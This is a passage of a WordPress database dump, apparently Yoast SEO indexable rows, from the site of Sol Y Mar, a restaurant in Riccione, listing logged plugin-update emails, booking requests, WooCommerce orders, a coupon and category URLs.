5.5.3','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-10-31 00:23:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(355,NULL,NULL,1207,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Your site has updated to WordPress 5.5.3','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-10-31 00:23:49','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(356,NULL,NULL,1208,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-02 12:22:52','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(357,NULL,NULL,1209,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-02 12:22:52','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(358,NULL,NULL,1210,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-03 00:23:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(359,NULL,NULL,1211,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-03 00:23:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(360,NULL,NULL,1212,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: Da sito Sol Y Mar: &#8220;Richiesta conferma apertura&#8221;','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-03 15:08:44','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(361,NULL,NULL,1213,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: Da sito Sol Y Mar: &#8220;Richiesta conferma apertura&#8221;','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-03 15:08:45','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(362,NULL,NULL,1214,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: Da sito Sol Y Mar: &#8220;Richiesta disponibilità&#8221;','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-03 17:34:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(363,NULL,NULL,1215,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: Da sito Sol Y Mar: &#8220;Richiesta disponibilità&#8221;','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-03 17:34:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(364,NULL,NULL,1216,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-04 00:22:51','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(365,NULL,NULL,1217,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-04 00:22:51','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(366,NULL,NULL,1218,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-05 00:23:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(367,NULL,NULL,1219,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-05 00:23:28','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(368,NULL,NULL,1220,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: Da sito Sol Y Mar: &#8220;Prenotazione Domenica 8 Novembre 2020&#8221;','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-05 10:08:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(369,NULL,NULL,1221,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: Da sito Sol Y Mar: &#8220;Prenotazione Domenica 8 Novembre 2020&#8221;','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-05 10:08:43','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(370,NULL,NULL,1222,'post','shop_order',1,0,NULL,NULL,'Protected: Order &ndash; November 5, 2020 @ 08:02 PM','wc-processing',0,1,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-05 19:02:45','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(371,NULL,NULL,1223,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1222) &#8211; 5 November 2020','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,'2020-11-05 19:04:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(372,NULL,NULL,1224,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1222) &#8211; 5 November 2020','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,'2020-11-05 19:04:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(373,NULL,NULL,1225,'post','postman_sent_mail',0,0,NULL,NULL,'Private: Your Sol Y Mar, ristorante a Riccione order has been received!','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-05 19:04:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(374,NULL,NULL,1226,'post','postman_sent_mail',0,0,NULL,NULL,'Private: Your Sol Y Mar, ristorante a Riccione order has been received!','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-05 19:04:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(375,NULL,NULL,1227,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: Da sito Sol Y Mar: &#8220;Conferma prenotazione&#8221;','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-05 19:23:34','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(376,NULL,NULL,1228,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: Da sito Sol Y Mar: &#8220;Conferma prenotazione&#8221;','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-05 19:23:34','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(377,NULL,NULL,1229,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-06 00:24:08','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(378,NULL,NULL,1230,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-06 00:24:08','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(379,NULL,NULL,1231,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-11 00:26:04','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(380,NULL,NULL,1232,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-11 00:26:04','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(382,NULL,NULL,1235,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-16 12:23:00','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(383,NULL,NULL,1236,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-16 12:23:00','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(384,NULL,NULL,1237,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-17 12:28:07','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(385,NULL,NULL,1238,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-17 12:28:07','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(386,NULL,NULL,1239,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-19 12:28:44','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(387,NULL,NULL,1240,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-19 12:28:44','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(388,NULL,NULL,1241,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-20 12:22:58','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(389,NULL,NULL,1242,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-20 12:22:59','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(390,NULL,NULL,1243,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-21 00:24:06','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(391,NULL,NULL,1244,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-21 00:24:06','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(392,NULL,NULL,1245,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-24 00:22:37','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(393,NULL,NULL,1246,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-24 00:22:37','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(394,NULL,NULL,1247,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-25 00:22:34','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(395,NULL,NULL,1248,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-25 00:22:34','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(396,NULL,NULL,1249,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-25 12:24:50','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(397,NULL,NULL,1250,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-25 12:24:50','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(398,NULL,NULL,1251,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-26 00:22:37','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(399,NULL,NULL,1252,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-26 00:22:37','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(400,NULL,NULL,1253,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-26 12:24:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(401,NULL,NULL,1254,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-26 12:24:47','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(402,NULL,NULL,1255,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-27 12:23:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(403,NULL,NULL,1256,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-27 12:23:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(404,NULL,NULL,1257,'post','shop_order',1,0,NULL,NULL,'Protected: Order &ndash; November 28, 2020 @ 03:27 PM','wc-processing',0,1,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-28 14:27:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(405,NULL,NULL,1258,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1257) &#8211; 28 November 2020','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,'2020-11-28 14:28:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(406,NULL,NULL,1259,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1257) &#8211; 28 November 2020','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,'2020-11-28 14:28:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(407,NULL,NULL,1260,'post','postman_sent_mail',0,0,NULL,NULL,'Private: Your Sol Y Mar, ristorante a Riccione order has been received!','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-28 14:28:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(408,NULL,NULL,1261,'post','postman_sent_mail',0,0,NULL,NULL,'Private: Your Sol Y Mar, ristorante a Riccione order has been received!','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-28 14:28:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(409,NULL,NULL,1262,'post','shop_coupon',0,0,NULL,NULL,'solymarcouponE5MGX','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-11-28 14:28:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(410,NULL,NULL,1263,'post','postman_sent_mail',0,0,NULL,NULL,'Private: Sol Y Mar, ristorante a Riccione','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png',NULL,NULL,'first-content-image',NULL,NULL,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png',NULL,'first-content-image',NULL,1,NULL,NULL,'2020-11-28 14:28:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(411,NULL,NULL,1264,'post','postman_sent_mail',0,0,NULL,NULL,'Private: Sol Y Mar, ristorante a Riccione','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png',NULL,NULL,'first-content-image',NULL,NULL,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png',NULL,'first-content-image',NULL,1,NULL,NULL,'2020-11-28 14:28:27','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(412,NULL,NULL,1265,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-02 12:22:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(413,NULL,NULL,1266,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-02 12:22:39','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(414,NULL,NULL,1267,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 00:22:34','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(415,NULL,NULL,1268,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 00:22:34','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(418,NULL,NULL,1271,'post','oembed_cache',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 09:41:40','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1518,NULL,NULL,3696,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-05 00:29:09','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(420,'https://www.ristorantesolymar.it/vecchio/category/healthy/','58:31e942fd3a5d2c1b0849257db7b6cb52',36,'term','category',NULL,NULL,NULL,NULL,'Healthy',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,4,NULL,'2020-12-05 16:04:01','2021-02-01 04:35:32',1,NULL,NULL,NULL,NULL,0,NULL),(421,'https://www.ristorantesolymar.it/vecchio/category/recepies/','59:8c8c273ac005d32e0dc8e177a1bad25e',37,'term','category',NULL,NULL,NULL,NULL,'Recepies',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-01 04:35:35',1,NULL,NULL,NULL,NULL,0,NULL),(422,'https://www.ristorantesolymar.it/vecchio/category/uncategorized/','64:14035158a783f632078eca8eb3fd9929',38,'term','category',NULL,NULL,NULL,NULL,'Uncategorized',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-01 04:35:38',1,NULL,NULL,NULL,NULL,0,NULL),(423,'https://www.ristorantesolymar.it/vecchio/restaurant-menu-category/afterdinner-cocktails/','88:07511f4b83f3e299301670612a99b7d7',39,'term','restaurant-menu-category',NULL,NULL,NULL,NULL,'Afterdinner Cocktails',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:04:01','2021-02-01 